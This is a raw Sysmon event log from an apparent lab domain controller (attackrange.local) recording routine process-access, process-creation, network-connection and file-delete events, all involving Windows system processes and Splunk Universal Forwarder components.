10341000x80000000000000001696716Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:05.599{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696715Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:05.599{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696714Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:05.599{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696713Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:05.599{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696712Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:05.599{05ADC7E1-229D-6039-0500-00000000AD01}6361168C:\Windows\system32\csrss.exe{05ADC7E1-70C9-603D-6788-00000000AD01}8760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001696711Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:05.599{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-70C9-603D-6788-00000000AD01}8760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001696710Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:05.600{05ADC7E1-70C9-603D-6788-00000000AD01}8760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001696709Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:57.421{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local55153-false10.0.1.12-8000- 354300x80000000000000001696708Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:57.217{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local56111- 23542300x80000000000000001696707Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:05.074{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=54804F21B5CEBD240F42F749EF068A6E,SHA256=CE21889D24FEA9810D1058B565F797311C6D3F8F6260AF5869092EBB46C9E870,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001696737Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:06.942{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-70CA-603D-6988-00000000AD01}4260C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696736Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:06.942{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696735Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:06.942{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696734Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:06.942{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696733Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:06.942{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696732Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:06.942{05ADC7E1-229D-6039-0500-00000000AD01}636652C:\Windows\system32\csrss.exe{05ADC7E1-70CA-603D-6988-00000000AD01}4260C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001696731Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:06.942{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-70CA-603D-6988-00000000AD01}4260C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001696730Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:06.943{05ADC7E1-70CA-603D-6988-00000000AD01}4260C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001696729Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:06.870{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FB2EC89B00DEB8740E94D5FA2F50219,SHA256=20361A2056ABA555BE35DAFC4B1CAEB906BA15CF82EF08D96579C7D110E30D61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696728Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:06.616{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=854C9128D3CEF2A1D0991C1D060EA07D,SHA256=43F4C6D83808C2B2CE84DF56DA850494AB5DE8CE244EB32C83A0BC362EECB57B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001696727Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:06.274{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-70CA-603D-6888-00000000AD01}6772C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696726Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:06.274{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696725Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:06.274{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696724Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:06.274{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696723Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:06.274{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696722Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:06.274{05ADC7E1-229D-6039-0500-00000000AD01}6361168C:\Windows\system32\csrss.exe{05ADC7E1-70CA-603D-6888-00000000AD01}6772C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001696721Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:06.274{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-70CA-603D-6888-00000000AD01}6772C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001696720Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:06.272{05ADC7E1-70CA-603D-6888-00000000AD01}6772C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001696739Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:07.927{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=13E105ED2AC13ACC76D0DF42CC9562D8,SHA256=C2952E62044FDA19D2C884B2099C9B60135FF31EB8DAB0EC65B2D5F558855EB8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696738Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:07.874{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=973BD674911CFF7802298DB794D9B615,SHA256=5ECD5587D8EF447E07ADD06979F1A73F754A464AA75D0D8775315550592993E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696740Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:08.927{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACBC7F0C018710D93DEB6DF82EFC50AE,SHA256=5F1B0602CDCA5BD411F8E7D18DB504EC506330DD615A3D0483915FF6898ADFBD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696750Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:09.965{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC1C67AF94A53D703FA6C92895F6747B,SHA256=981B022A430FE12A0E5110749F66F987A2CE8879D72CE55D4BF9D0ED084F843B,IMPHASH=00000000000000000000000000000000falsetrue 